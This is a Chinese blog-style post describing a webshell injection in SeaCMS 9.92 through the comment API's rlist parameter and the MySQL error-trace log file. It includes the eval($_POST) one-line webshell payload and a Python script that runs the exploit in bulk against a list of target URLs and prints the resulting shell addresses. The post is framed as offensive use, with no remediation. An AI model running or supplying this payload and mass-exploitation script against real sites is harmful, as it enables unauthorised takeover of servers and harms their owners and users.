浅谈seacms的getshell

最近几天一直在研究对cms的get shell,刚好看到几篇文章是关于对seacms代码审计,所以尝试写一个exp来对seacms进行getshell【seacms版本为9.92】

0x001-出现漏洞的代码

关键在于$rlist这个变量是可控的,因为下图目录在comment/api/index.php
浅谈seacms的getshell_第1张图片
在include/sql.class.php文件下有个重大漏洞,设置了一个储存报错内容的文件。
浅谈seacms的getshell_第2张图片
在这里插入图片描述

在include/filter.inc.php 文件下,将三种请求方式注册了全局变量
浅谈seacms的getshell_第3张图片

0x002-漏洞利用

构造的payload:*/eval($_POST[1]);/*
浅谈seacms的getshell_第4张图片

然后一句话木马会写进/data/mysqli_error_trace.php文件中
浅谈seacms的getshell_第5张图片

利用蚁剑或者菜刀连接成功
浅谈seacms的getshell_第6张图片

0x003-exp脚本

导入seacms的url,批量进行getshell

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=*/eval($_POST[1]);/*'

for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("getshell地址:"+url+"/data/mysqli_error_trace.php")

    except Exception as e:
        pass

你可能感兴趣的:(笔记)